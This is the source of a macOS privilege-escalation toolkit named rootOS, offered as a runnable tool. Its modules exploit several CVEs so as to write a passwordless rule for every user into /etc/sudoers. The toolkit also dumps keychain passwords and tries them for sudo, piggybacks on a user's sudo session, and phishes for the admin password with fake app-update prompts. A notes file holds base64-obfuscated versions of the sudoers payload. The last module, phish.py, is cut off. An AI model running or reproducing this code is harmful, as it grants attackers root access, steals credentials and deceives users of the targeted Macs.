├── .flake8
├── keysteal.zip
├── Prompt.app.zip
├── docs
    ├── phishing.png
    └── screenshot.png
├── exploits
    ├── __init__.py
    ├── dyld_print_to_file.py
    ├── ardagent.py
    ├── nopass.py
    ├── proxifier.py
    ├── piggyback.py
    ├── libmalloc.py
    ├── sera.py
    ├── keysteal.py
    ├── phish.py
    └── general.py
├── .github
    └── ISSUE_TEMPLATE
    │   ├── .github
    │       └── workflows
    │       │   └── push.yml
    │   └── bug_report.md
├── LICENSE
├── root.py
├── apps.json
├── README.md
├── payload.md
└── .gitignore


/.flake8:
--------------------------------------------------------------------------------
1 | [flake8]
2 | max-line-length = 120
3 | 


--------------------------------------------------------------------------------
/keysteal.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/thehappydinoa/rootOS/HEAD/keysteal.zip


--------------------------------------------------------------------------------
/Prompt.app.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/thehappydinoa/rootOS/HEAD/Prompt.app.zip


--------------------------------------------------------------------------------
/docs/phishing.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/thehappydinoa/rootOS/HEAD/docs/phishing.png


--------------------------------------------------------------------------------
/docs/screenshot.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/thehappydinoa/rootOS/HEAD/docs/screenshot.png


--------------------------------------------------------------------------------
/exploits/__init__.py:
--------------------------------------------------------------------------------
 1 | """__init__.py"""
 2 | import glob
 3 | import os
 4 | 
 5 | __all__ = [
 6 |     os.path.basename(f)[:-3]
 7 |     for f in glob.glob(os.path.join(os.path.dirname(__file__), "*.py"))
 8 |     if f not in ["__init__.py", "general.py"]
 9 | ]
10 | 


--------------------------------------------------------------------------------
/.github/ISSUE_TEMPLATE/.github/workflows/push.yml:
--------------------------------------------------------------------------------
 1 | on: push
 2 | name: on push
 3 | jobs:
 4 |   gitHubActionForFlake8:
 5 |     name: GitHub Action for Flake8
 6 |     runs-on: ubuntu-latest
 7 |     steps:
 8 |       - uses: actions/checkout@master
 9 |       - name: GitHub Action for Flake8
10 |         uses: cclauss/GitHub-Action-for-Flake8@master
11 |         with:
12 |           args: flake8 . --count --select=E9,F63,F7,F82 --show-source --statistics
13 | 


--------------------------------------------------------------------------------
/exploits/dyld_print_to_file.py:
--------------------------------------------------------------------------------
 1 | """dyld_print_to_file oneliner"""
 2 | import os
 3 | from distutils.version import LooseVersion
 4 | 
 5 | __cve__ = "2015-3760"
 6 | __credits__ = "Stefan Esser"
 7 | 
 8 | 
 9 | def vulnerable(version):
10 |     """checks vulnerability"""
11 |     return version >= LooseVersion("10.10") and version <= LooseVersion("10.10.4")
12 | 
13 | 
14 | def run():
15 |     """runs exploit"""
16 |     response = os.system(
17 |         "echo 'echo \"ALL ALL=(ALL) NOPASSWD:ALL\" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp;"
18 |     )
19 |     return not response == 256
20 | 


--------------------------------------------------------------------------------
/.github/ISSUE_TEMPLATE/bug_report.md:
--------------------------------------------------------------------------------
 1 | ---
 2 | name: Bug report
 3 | about: Create a report to help us improve
 4 | title: ''
 5 | labels: bug
 6 | assignees: ''
 7 | ---
 8 | 
 9 | **Describe the bug**
10 | A clear and concise description of what the bug is.
11 | 
12 | **Screenshots**
13 | If applicable, add screenshots to help explain your problem.
14 | 
15 | **Info (please complete the following information):**
16 | 
17 | -   macOS Version [e.g. 10.14.3]
18 | -   Version [e.g. 1.2.0]
19 | -   Exploit [e.g. exploits.phish]
20 | 
21 | **Additional context**
22 | Add any other context about the problem here.
23 | 


--------------------------------------------------------------------------------
/exploits/ardagent.py:
--------------------------------------------------------------------------------
 1 | """ARDAgent do shell script"""
 2 | from distutils.version import LooseVersion
 3 | 
 4 | from .general import DEFAULT_COMMAND, osascript, random_string
 5 | 
 6 | __cve__ = "2008-2830"
 7 | __credits__ = "anonymous"
 8 | 
 9 | 
10 | def vulnerable(version):
11 |     """checks vulnerability"""
12 |     return version <= LooseVersion("10.5.8")
13 | 
14 | 
15 | def run():
16 |     """runs exploit"""
17 |     rand = random_string()
18 |     payload = """osascript <<END
19 |       set command to "{command}; echo {success}"
20 |       return tell app "ARDAgent" to do shell script command
21 |     END""".format(
22 |         command=DEFAULT_COMMAND, success=rand
23 |     )
24 |     response = osascript(payload)
25 |     return rand in response
26 | 


--------------------------------------------------------------------------------
/exploits/nopass.py:
--------------------------------------------------------------------------------
 1 | """root with no password"""
 2 | from distutils.version import LooseVersion
 3 | 
 4 | from .general import DEFAULT_COMMAND, osascript, random_string
 5 | 
 6 | __cve__ = "2017-13872"
 7 | __credits__ = "lemiorhan"
 8 | 
 9 | 
10 | def vulnerable(version):
11 |     """checks vulnerability"""
12 |     return version == LooseVersion("10.13.1")
13 | 
14 | 
15 | def run():
16 |     """runs exploit"""
17 |     rand = random_string()
18 |     payload = """osascript <<END
19 |       set command to "{command}; echo {success}"
20 |       return do shell script command user name "root" password "" with administrator privileges
21 |     END""".format(
22 |         command=DEFAULT_COMMAND, success=rand
23 |     )
24 |     response = osascript(payload)
25 |     return rand in response
26 | 


--------------------------------------------------------------------------------
/exploits/proxifier.py:
--------------------------------------------------------------------------------
 1 | """Proxifier app"""
 2 | from distutils.version import LooseVersion
 3 | 
 4 | from .general import (
 5 |     DEFAULT_COMMAND,
 6 |     app_installed,
 7 |     app_version,
 8 |     osascript,
 9 |     random_string,
10 | )
11 | 
12 | __cve__ = "2017-7643"
13 | __credits__ = "m4rkw"
14 | 
15 | 
16 | def vulnerable(version):
17 |     """checks vulnerability"""
18 |     return app_installed("Proxifier.app") and app_version(
19 |         "Proxifier.app"
20 |     ) < LooseVersion("2.19")
21 | 
22 | 
23 | def run():
24 |     """runs exploit"""
25 |     rand = random_string()
26 |     payload = """/Applications/Proxifier.app/Contents/KLoader '; {command}; echo {success}'""".format(
27 |         command=DEFAULT_COMMAND, success=rand
28 |     )
29 |     response = osascript(payload)
30 |     return rand in response
31 | 


--------------------------------------------------------------------------------
/exploits/piggyback.py:
--------------------------------------------------------------------------------
 1 | """piggybacks off a sudo command"""
 2 | import os.path
 3 | import time
 4 | from distutils.version import LooseVersion
 5 | from subprocess import CalledProcessError, call
 6 | 
 7 | from .general import DEFAULT_COMMAND, interaction_prompt
 8 | 
 9 | __cve__ = ""
10 | __credits__ = "n00py"
11 | 
12 | 
13 | def vulnerable(version):
14 |     """checks vulnerability"""
15 |     if version < LooseVersion("10.13.0"):
16 |         return interaction_prompt(
17 |             "Do you want to piggyback off sudo (waits until sudo is used)?"
18 |         )
19 |     return
20 | 
21 | 
22 | def run():
23 |     """runs exploit"""
24 |     sudo_dir = "/var/db/sudo"
25 |     call(["sudo -K"], shell=True)
26 |     old_time = time.ctime(os.path.getmtime(sudo_dir))
27 |     exit_loop = False
28 |     while exit_loop is False:
29 |         new_time = time.ctime(os.path.getmtime(sudo_dir))
30 |         if old_time != new_time:
31 |             try:
32 |                 call([DEFAULT_COMMAND], shell=True)
33 |                 exit_loop = True
34 |             except (OSError, CalledProcessError):
35 |                 pass
36 |     return exit_loop
37 | 


--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
 1 | MIT License
 2 | 
 3 | Copyright (c) 2019 Aidan Holland
 4 | 
 5 | Permission is hereby granted, free of charge, to any person obtaining a copy
 6 | of this software and associated documentation files (the "Software"), to deal
 7 | in the Software without restriction, including without limitation the rights
 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 | 
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 | 
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 | 


--------------------------------------------------------------------------------
/exploits/libmalloc.py:
--------------------------------------------------------------------------------
 1 | """crontab editing using libmalloc"""
 2 | import os
 3 | import time
 4 | from distutils.version import LooseVersion
 5 | 
 6 | __cve__ = "2015-5889"
 7 | __credits__ = "rebel"
 8 | 
 9 | 
10 | def vulnerable(version):
11 |     """checks vulnerability"""
12 |     return version <= LooseVersion("10.11")
13 | 
14 | 
15 | def run():
16 |     """runs exploit"""
17 |     size = os.stat("/etc/sudoers").st_size
18 | 
19 |     env = dict()
20 |     env["MallocLogFile"] = "/etc/crontab"
21 |     env["MallocStackLogging"] = "yes"
22 |     env[
23 |         "MallocStackLoggingDirectory"
24 |     ] = 'a\n* * * * * root echo "ALL ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers\n\n\n\n\n'
25 | 
26 |     print("Trying /etc/crontab...")
27 | 
28 |     pid = os.fork()
29 |     if pid == 0:
30 |         os.close(1)
31 |         os.close(2)
32 |         os.execve("/usr/bin/rsh", ["rsh", "localhost"], env)
33 | 
34 |     time.sleep(1)
35 | 
36 |     try:
37 |         crontab = open("/etc/crontab").read()
38 |         if "NOPASSWD" not in crontab:
39 |             return
40 |     except IOError:
41 |         return
42 | 
43 |     print("Done \nWaiting for /etc/sudoers to change (<60 seconds)...")
44 | 
45 |     while os.stat("/etc/sudoers").st_size == size:
46 |         print(".")
47 |         time.sleep(1)
48 | 
49 |     return True
50 | 


--------------------------------------------------------------------------------
/exploits/sera.py:
--------------------------------------------------------------------------------
 1 | """Sera app"""
 2 | import os.path
 3 | import plistlib
 4 | from xml.parsers.expat import ExpatError
 5 | 
 6 | from .general import (
 7 |     DEFAULT_COMMAND,
 8 |     USER,
 9 |     app_installed,
10 |     osascript,
11 |     random_string,
12 |     try_password,
13 | )
14 | 
15 | __cve__ = ""
16 | __credits__ = "m4rkw"
17 | 
18 | 
19 | def vulnerable(version):
20 |     """checks vulnerability"""
21 |     return app_installed("SeraOSX.app")
22 | 
23 | 
24 | def run():
25 |     """runs exploit"""
26 |     try:
27 |         with open(
28 |             os.path.join(
29 |                 os.path.expanduser("~"), "/Library/Preferences/no.ignitum.SeraOSX.plist"
30 |             ), "rb"
31 |         ) as plist_file:
32 |             plist = plistlib.load(plist_file)
33 |     except ExpatError:
34 |         return
35 |     sera_pass = plist.get("sera_pass")
36 |     if not try_password(sera_pass):
37 |         return
38 |     rand = random_string()
39 |     payload = """osascript <<END
40 |       set command to "{command}; echo {success}"
41 |       return do shell script command user name "{user}" password "{password}" with administrator privileges
42 |     END""".format(
43 |         command=DEFAULT_COMMAND, success=rand, user=USER, password=sera_pass
44 |     )
45 |     response = osascript(payload)
46 |     return rand in response
47 | 


--------------------------------------------------------------------------------
/root.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | import platform
 3 | from distutils.version import LooseVersion
 4 | 
 5 | from exploits import (
 6 |     ardagent,
 7 |     dyld_print_to_file,
 8 |     keysteal,
 9 |     libmalloc,
10 |     nopass,
11 |     phish,
12 |     piggyback,
13 |     proxifier,
14 |     sera,
15 | )
16 | 
17 | OS_EXPLOITS = [ardagent, dyld_print_to_file, libmalloc, nopass]
18 | APP_EXPLOITS = [proxifier, sera]
19 | INTERACTION_EXPLOITS = [piggyback, keysteal, phish]
20 | 
21 | EXPLOITS = OS_EXPLOITS + APP_EXPLOITS + INTERACTION_EXPLOITS
22 | 
23 | REDC = "\033[91m[-] "
24 | YELLOWC = "\033[93m[!] "
25 | GREENC = "\033[92m[+] "
26 | ENDC = "\033[00m"
27 | NL = "\n"
28 | 
29 | 
30 | def main():
31 |     """main function"""
32 |     version = platform.mac_ver()[0]
33 |     print(GREENC + "Trying to escalate privileges on macOS %s..." % version + ENDC)
34 |     for exploit in EXPLOITS:
35 |         if not all(ex in dir(exploit) for ex in ["vulnerable", "run"]):
36 |             continue
37 |         if not exploit.vulnerable(LooseVersion(version)):
38 |             print(NL + YELLOWC + "Skipping %s..." % exploit.__name__ + ENDC)
39 |             continue
40 |         print(NL + YELLOWC + "Trying %s..." % exploit.__name__ + ENDC)
41 |         try:
42 |             result = exploit.run()
43 |         except KeyboardInterrupt:
44 |             continue
45 |         if result:
46 |             print(GREENC + exploit.__name__ + " was successful!" + ENDC)
47 |             return result
48 |         print(NL + REDC + "Failed" + ENDC)
49 |     print(NL + REDC + "All Exploits Unsuccessful" + ENDC)
50 |     return
51 | 
52 | 
53 | if __name__ == "__main__":
54 |     try:
55 |         main()
56 |     except KeyboardInterrupt:
57 |         print("\nExitting...")
58 |         exit(0)
59 | 


--------------------------------------------------------------------------------
/apps.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "p1": {
 3 |     "Firefox.app": ["/Contents/Resources/firefox.icns", "Firefox Software Update", "Verified"],
 4 |     "Google Chrome.app": ["/Contents/Resources/app.icns", "GoogleSoftwareUpdate", "Verified"]
 5 |   },
 6 |   "p2": {
 7 |     "Dropbox.app": ["/Contents/Resources/icon.icns", "DropboxMacUpdate", "Verified"],
 8 |     "CCleaner.app": ["/Contents/Resources/c.icns", "CCleaner Update"],
 9 |     "Spotify.app": ["/Contents/Resources/Icon.icns", "Spotify Updater"],
10 |     "Alfred 3.app": ["/Contents/Preferences/Alfred Preferences.app/Contents/Resources/appicon.icns", "Alfred Update"],
11 |     "The Unarchiver.app": ["/Contents/Resources/unarchiver.icns", "The Unarchiver Update"],
12 |     "VLC.app": ["/Contents/Resources/VLC.icns", "VLC Update"]
13 |   },
14 |   "p3": {
15 |     "Atom.app": ["/Contents/Resources/atom.icns", "Atom Updater"],
16 |     "Atom Beta.app": ["/Contents/Resources/atom.icns", "Atom Beta Updater"],
17 |     "Visual Studio.app": ["/Contents/MacOS/Visual Studio Update.app/Contents/Resources/XamarinUpdate.icns", "Visual Studio Update", "Verified"],
18 |     "Android Studio.app": ["/Contents/Resources/studio.icns", "Android Studio Update"],
19 |     "Docker.app": ["/Contents/Resources/Appicon.icns", "Docker Update"],
20 |     "GitHub Desktop.app": ["/Contents/Resources/electron.icns", "GitHub Desktop Update"]
21 |   },
22 |   "p4": {
23 |     "Product Hunt.app": ["/Contents/Resources/Appicon.icns", "Product Hunt Update"],
24 |     "Cyberduck.app": ["/Contents/Resources/cyberduck-application.icns", "Cyberduck Update"],
25 |     "Hex Fiend.app": ["/Contents/Resources/hex_icon.icns", "Hex Fiend Update"],
26 |     "Gas Mask.app": ["/Contents/Resources/applicationIcon.icns", "Gas Mask Update"],
27 |     "Tor Browser.app": ["/Contents/MacOS/updater.app/Contents/Resources/updater.icns", "Tor Software Update"],
28 |     "Paste.app": ["/Contents/Resources/AppIcon.icns", "Paste Update"]
29 |   },
30 |   "p5": {
31 |     "Xcode.app": ["/Contents/Resources/Xcode.icns", "Xcode Update"],
32 |     "Safari.app": ["/Contents/Resources/compass.icns", "Safari Update"],
33 |     "iTunes.app": ["/Contents/Resources/iTunes.icns", "iTunes Update"],
34 |     "System Preferences.app": ["/Contents/Resources/PrefApp.icns", "System Update"]
35 |   }
36 | }
37 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # rootOS
 2 | 
 3 | Tries to use various CVEs to gain sudo or root access. All exploits have an end goal of adding `ALL ALL=(ALL) NOPASSWD: ALL` to `/etc/sudoers` allowing any user to run `sudo` commands.
 4 | 
 5 | ![screenshot](docs/screenshot.png)
 6 | 
 7 | ## Run
 8 | 
 9 | ```bash
10 | python root.py
11 | ```
12 | 
13 | ## Exploits
14 | 
15 | | Name                         | CVE            | Date       | Link(s)                                                                                                |
16 | | ---------------------------- | -------------- | ---------- | ------------------------------------------------------------------------------------------------------ |
17 | | ARDAgent                     | CVE-2008-2830  | 06/23/2008 | <https://nvd.nist.gov/vuln/detail/CVE-2008-2830>                                                       |
18 | | DYLD_PRINT_TO_FILE           | CVE-2015-3760  | 08/16/2015 | <https://nvd.nist.gov/vuln/detail/CVE-2015-3760> <https://twitter.com/i0n1c/status/623727538234368000> |
19 | | MallocLog                    | CVE-2015-5889  | 0/09/2015  | <https://nvd.nist.gov/vuln/detail/CVE-2015-5889>                                                       |
20 | | Proxifier Sanitize           | CVE-2017-7643  | 04/14/2017 | <https://nvd.nist.gov/vuln/detail/CVE-2017-7643>                                                       |
21 | | Sera Local Pass              |                | 10/31/2017 | <https://m4.rkw.io/blog/cve201715918-sera-12-local-root-privesc-and-password-disclosure.html>          |
22 | | NoPass                       | CVE-2017-13872 | 11/29/2017 | <https://nvd.nist.gov/vuln/detail/CVE-2017-13872> <https://objective-see.com/blog/blog_0x24.html>      |
23 | | KeySteal                     | CVE-2019-8526  | 06/01/2019 | <https://github.com/LinusHenze/Keysteal>                                                               |
24 | | AppleScript Dynamic Phishing |                |            | <https://github.com/thehappydinoa/rootOS/blob/master/apps.json>                                        |
25 | | Sudo Piggyback               |                |            | <https://www.n00py.io/2016/10/privilege-escalation-on-os-x-without-exploits/>                          |
26 | 
27 | ### Dynamic Phishing
28 | 
29 | ![phishing](docs/phishing.png)
30 | 
31 | Please note the dynamic icon and prompt
32 | 
33 | ## Additional Exploits
34 | 
35 | - [amanszpapaya/MacPer](https://github.com/amanszpapaya/MacPer)
36 | 
37 | ## License
38 | 
39 | [MIT](LICENSE)
40 | 


--------------------------------------------------------------------------------
/payload.md:
--------------------------------------------------------------------------------
 1 | # Payload
 2 | 
 3 | ## Part 1
 4 | 
 5 | ```python
 6 | if os.getuid() == 0: os.system('echo "ALL ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers')
 7 | else: print("User is not root")
 8 | ```
 9 | 
10 | ## Part 1 base64
11 | 
12 | ```python
13 | if os.getuid() == 0: os.system(base64.b64decode('ZWNobyAiQUxMIEFMTD0oQUxMKSBOT1BBU1NXRDogQUxMIiA+PiAvZXRjL3N1ZG9lcnM='))
14 | else: print(base64.b64decode('VXNlciBpcyBub3Qgcm9vdA=='))
15 | ```
16 | 
17 | ## Part 2
18 | 
19 | ```python
20 | import base64, os; exec(base64.b64decode('aWYgb3MuZ2V0dWlkKCkgPT0gMDogb3Muc3lzdGVtKGJhc2U2NC5iNjRkZWNvZGUoJ1pXTm9ieUFpUVV4TUlFRk1URDBvUVV4TUtTQk9UMUJCVTFOWFJEb2dRVXhNSWlBK1BpQXZaWFJqTDNOMVpHOWxjbk09JykpDQplbHNlOiBwcmludChiYXNlNjQuYjY0ZGVjb2RlKCdWWE5sY2lCcGN5QnViM1FnY205dmRBPT0nKSk='))
21 | ```
22 | 
23 | ## Part 3
24 | 
25 | ```python
26 | python -c "$(echo aW1wb3J0IGJhc2U2NCwgb3M7IGV4ZWMoYmFzZTY0LmI2NGRlY29kZSgnYVdZZ2IzTXVaMlYwZFdsa0tDa2dQVDBnTURvZ2IzTXVjM2x6ZEdWdEtHSmhjMlUyTkM1aU5qUmtaV052WkdVb0oxcFhUbTlpZVVGcFVWVjRUVWxGUmsxVVJEQnZVVlY0VFV0VFFrOVVNVUpDVlRGT1dGSkViMmRSVlhoTlNXbEJLMUJwUVhaYVdGSnFURE5PTVZwSE9XeGpiazA5SnlrcERRcGxiSE5sT2lCd2NtbHVkQ2hpWVhObE5qUXVZalkwWkdWamIyUmxLQ2RXV0U1c1kybENjR041UW5WaU0xRm5ZMjA1ZG1SQlBUMG5LU2s9Jykp | base64 -D)"
27 | ```
28 | 
29 | or
30 | 
31 | ```bash
32 | python -c \"$(echo aW1wb3J0IGJhc2U2NCwgb3M7IGV4ZWMoYmFzZTY0LmI2NGRlY29kZSgnYVdZZ2IzTXVaMlYwZFdsa0tDa2dQVDBnTURvZ2IzTXVjM2x6ZEdWdEtHSmhjMlUyTkM1aU5qUmtaV052WkdVb0oxcFhUbTlpZVVGcFVWVjRUVWxGUmsxVVJEQnZVVlY0VFV0VFFrOVVNVUpDVlRGT1dGSkViMmRSVlhoTlNXbEJLMUJwUVhaYVdGSnFURE5PTVZwSE9XeGpiazA5SnlrcERRcGxiSE5sT2lCd2NtbHVkQ2hpWVhObE5qUXVZalkwWkdWamIyUmxLQ2RXV0U1c1kybENjR041UW5WaU0xRm5ZMjA1ZG1SQlBUMG5LU2s9Jykp | base64 -D)\"
33 | ```
34 | 
35 | ## Modified Part 1
36 | 
37 | ```python
38 | if os.getuid() == 0: os.system('echo "ALL ALL=(ALL) NOPASSWD: ALL" >> test.log; echo echoed')
39 | else: print("User is not root")
40 | ```
41 | 
42 | ## Modified Part 2
43 | 
44 | ```python
45 | import base64, os; exec(base64.b64decode('aWYgb3MuZ2V0dWlkKCkgPT0gMDogb3Muc3lzdGVtKCdlY2hvICJBTEwgQUxMPShBTEwpIE5PUEFTU1dEOiBBTEwiID4+IHRlc3QubG9nOyBlY2hvIGVjaG9lZCcpDQplbHNlOiBwcmludCgiVXNlciBpcyBub3Qgcm9vdCIp'))
46 | ```
47 | 
48 | ## Modified Part 3
49 | 
50 | ```python
51 | python -c "$(echo aW1wb3J0IGJhc2U2NCwgb3M7IGV4ZWMoYmFzZTY0LmI2NGRlY29kZSgnYVdZZ2IzTXVaMlYwZFdsa0tDa2dQVDBnTURvZ2IzTXVjM2x6ZEdWdEtDZGxZMmh2SUNKQlRFd2dRVXhNUFNoQlRFd3BJRTVQVUVGVFUxZEVPaUJCVEV3aUlENCtJSFJsYzNRdWJHOW5PeUJsWTJodklHVmphRzlsWkNjcERRcGxiSE5sT2lCd2NtbHVkQ2dpVlhObGNpQnBjeUJ1YjNRZ2NtOXZkQ0lwJykp | base64 -D)"
52 | ```
53 | 
54 | or
55 | 
56 | ```bash
57 | python -c \"$(echo aW1wb3J0IGJhc2U2NCwgb3M7IGV4ZWMoYmFzZTY0LmI2NGRlY29kZSgnYVdZZ2IzTXVaMlYwZFdsa0tDa2dQVDBnTURvZ2IzTXVjM2x6ZEdWdEtDZGxZMmh2SUNKQlRFd2dRVXhNUFNoQlRFd3BJRTVQVUVGVFUxZEVPaUJCVEV3aUlENCtJSFJsYzNRdWJHOW5PeUJsWTJodklHVmphRzlsWkNjcERRcGxiSE5sT2lCd2NtbHVkQ2dpVlhObGNpQnBjeUJ1YjNRZ2NtOXZkQ0lwJykp | base64 -D)\"
58 | ```
59 | 
60 | ## Delivery
61 | 
62 | ```bash
63 | osascript <<END
64 |     set command to "{command}"
65 |     return do shell script command with prompt "{prompt}" with administrator privileges
66 | END
67 | ```
68 | 


--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
  1 | # Byte-compiled / optimized / DLL files
  2 | __pycache__/
  3 | *.py[cod]
  4 | *$py.class
  5 | 
  6 | # C extensions
  7 | *.so
  8 | 
  9 | # Distribution / packaging
 10 | .Python
 11 | build/
 12 | develop-eggs/
 13 | dist/
 14 | downloads/
 15 | eggs/
 16 | .eggs/
 17 | lib/
 18 | lib64/
 19 | parts/
 20 | sdist/
 21 | var/
 22 | wheels/
 23 | share/python-wheels/
 24 | *.egg-info/
 25 | .installed.cfg
 26 | *.egg
 27 | MANIFEST
 28 | 
 29 | # PyInstaller
 30 | #  Usually these files are written by a python script from a template
 31 | #  before PyInstaller builds the exe, so as to inject date/other infos into it.
 32 | *.manifest
 33 | *.spec
 34 | 
 35 | # Installer logs
 36 | pip-log.txt
 37 | pip-delete-this-directory.txt
 38 | 
 39 | # Unit test / coverage reports
 40 | htmlcov/
 41 | .tox/
 42 | .nox/
 43 | .coverage
 44 | .coverage.*
 45 | .cache
 46 | nosetests.xml
 47 | coverage.xml
 48 | *.cover
 49 | *.py,cover
 50 | .hypothesis/
 51 | .pytest_cache/
 52 | cover/
 53 | 
 54 | # Translations
 55 | *.mo
 56 | *.pot
 57 | 
 58 | # Django stuff:
 59 | *.log
 60 | local_settings.py
 61 | db.sqlite3
 62 | db.sqlite3-journal
 63 | 
 64 | # Flask stuff:
 65 | instance/
 66 | .webassets-cache
 67 | 
 68 | # Scrapy stuff:
 69 | .scrapy
 70 | 
 71 | # Sphinx documentation
 72 | docs/_build/
 73 | 
 74 | # PyBuilder
 75 | .pybuilder/
 76 | target/
 77 | 
 78 | # Jupyter Notebook
 79 | .ipynb_checkpoints
 80 | 
 81 | # IPython
 82 | profile_default/
 83 | ipython_config.py
 84 | 
 85 | # pyenv
 86 | #   For a library or package, you might want to ignore these files since the code is
 87 | #   intended to run in multiple environments; otherwise, check them in:
 88 | # .python-version
 89 | 
 90 | # pipenv
 91 | #   According to pypa/pipenv#598, it is recommended to include Pipfile.lock in version control.
 92 | #   However, in case of collaboration, if having platform-specific dependencies or dependencies
 93 | #   having no cross-platform support, pipenv may install dependencies that don't work, or not
 94 | #   install all needed dependencies.
 95 | #Pipfile.lock
 96 | 
 97 | # PEP 582; used by e.g. github.com/David-OConnor/pyflow
 98 | __pypackages__/
 99 | 
100 | # Celery stuff
101 | celerybeat-schedule
102 | celerybeat.pid
103 | 
104 | # SageMath parsed files
105 | *.sage.py
106 | 
107 | # Environments
108 | .env
109 | .venv
110 | env/
111 | venv/
112 | ENV/
113 | env.bak/
114 | venv.bak/
115 | 
116 | # Spyder project settings
117 | .spyderproject
118 | .spyproject
119 | 
120 | # Rope project settings
121 | .ropeproject
122 | 
123 | # mkdocs documentation
124 | /site
125 | 
126 | # mypy
127 | .mypy_cache/
128 | .dmypy.json
129 | dmypy.json
130 | 
131 | # Pyre type checker
132 | .pyre/
133 | 
134 | # pytype static type analyzer
135 | .pytype/
136 | 
137 | # Cython debug symbols
138 | cython_debug/
139 | 
140 | # macOS
141 | .DS_Store
142 | __MACOSX
143 | 
144 | # IDE
145 | .vscode/
146 | 
147 | # Compressed
148 | Prompt.app
149 | dump-keychain.sh
150 | keystealDaemon
151 | libkeystealClient.dylib
152 | security
153 | security-unsigned
154 | 
155 | # Local Exploits
156 | exploits_macos_local
157 | 


--------------------------------------------------------------------------------
/exploits/keysteal.py:
--------------------------------------------------------------------------------
  1 | """root with no password"""
  2 | from __future__ import print_function
  3 | 
  4 | import base64
  5 | import binascii
  6 | import json
  7 | import os
  8 | import re
  9 | from distutils.version import LooseVersion
 10 | 
 11 | from .general import (
 12 |     DEFAULT_COMMAND,
 13 |     USER,
 14 |     get_values,
 15 |     interaction_prompt,
 16 |     osascript,
 17 |     random_string,
 18 |     try_password,
 19 | )
 20 | 
 21 | try:
 22 |     from json.decoder import JSONDecodeError
 23 | except ImportError:
 24 |     JSONDecodeError = ValueError
 25 | 
 26 | __cve__ = "2019-8526"
 27 | __credits__ = "pinauten.de"
 28 | 
 29 | 
 30 | def vulnerable(version):
 31 |     """checks vulnerability"""
 32 |     if version <= LooseVersion("10.14.3"):
 33 |         return interaction_prompt("Do you want to try to keysteal for sudo?")
 34 |     return
 35 | 
 36 | 
 37 | def read_passwords(text):
 38 |     """gets passwords from text"""
 39 |     data = re.findall('data:\n"(.*)"\nkeychain:', text) + re.findall(
 40 |         "data:\n'(.*)'\nkeychain:", text
 41 |     )
 42 |     passwords = list()
 43 |     for password in data:
 44 |         # Base64
 45 |         try:
 46 |             if base64.b64encode(base64.b64decode(password)) == password:
 47 |                 password = base64.b64decode(password)
 48 |         except (TypeError, binascii.Error):
 49 |             pass
 50 | 
 51 |         password = str(password).strip()
 52 | 
 53 |         # JSON
 54 |         if password.startswith("{") or password.startswith("["):
 55 |             try:
 56 |                 password = json.loads(password)
 57 |                 values = get_values(password)
 58 |                 passwords.extend(values)
 59 |                 continue
 60 |             except JSONDecodeError:
 61 |                 pass
 62 | 
 63 |         for bad_char in ["`", '"', "'"]:
 64 |             if bad_char in password:
 65 |                 continue
 66 | 
 67 |         if len(password) > 31 or len(password) < 4 or not password[0]:
 68 |             continue
 69 | 
 70 |         passwords.append(password)
 71 | 
 72 |     return passwords
 73 | 
 74 | 
 75 | def run():
 76 |     """runs exploit"""
 77 |     keysteal_bash = "dump-keychain.sh"
 78 |     keysteal_zip = "keysteal.zip"
 79 | 
 80 |     if not os.path.exists(keysteal_bash) and os.path.exists(keysteal_zip):
 81 |         os.system("unzip " + keysteal_zip)
 82 | 
 83 |     response = osascript("sh {bin}".format(bin=keysteal_bash))
 84 | 
 85 |     passwords = read_passwords(response)
 86 | 
 87 |     print(passwords)
 88 | 
 89 |     print("\nTrying passwords...\n")
 90 | 
 91 |     real_password = None
 92 | 
 93 |     for password in passwords:
 94 |         try:
 95 |             print(" Trying: {password}".format(password=password), end="\r")
 96 |             valid = try_password(password)
 97 |         except Exception as e:
 98 |             print(type(e))
 99 |             print(str(e))
100 |             continue
101 |         if valid:
102 |             real_password = password
103 |             break
104 | 
105 |     if not real_password:
106 |         return
107 | 
108 |     print("\nPassword: " + real_password)
109 | 
110 |     rand = random_string()
111 |     payload = """osascript <<END
112 |       set command to "{command}; echo {success}"
113 |       return do shell script command user name "{user}" password "{password}" with administrator privileges
114 |     END""".format(
115 |         command=DEFAULT_COMMAND, success=rand, user=USER, password=real_password
116 |     )
117 |     response = osascript(payload)
118 |     return rand in response
119 | 


--------------------------------------------------------------------------------
/exploits/phish.py:
--------------------------------------------------------------------------------
  1 | """phishes for sudo with AppleScript"""
  2 | import json
  3 | import os
  4 | import plistlib
  5 | from time import sleep
  6 | 
  7 | from .general import (
  8 |     DEFAULT_COMMAND,
  9 |     app_info,
 10 |     app_installed,
 11 |     app_running,
 12 |     interaction_prompt,
 13 |     osascript,
 14 |     random_string,
 15 |     kill_app,
 16 | )
 17 | 
 18 | __cve__ = "0000-00000"
 19 | __credits__ = "thehappydinoa"
 20 | 
 21 | 
 22 | def edit_app_info(app_path, prompt):
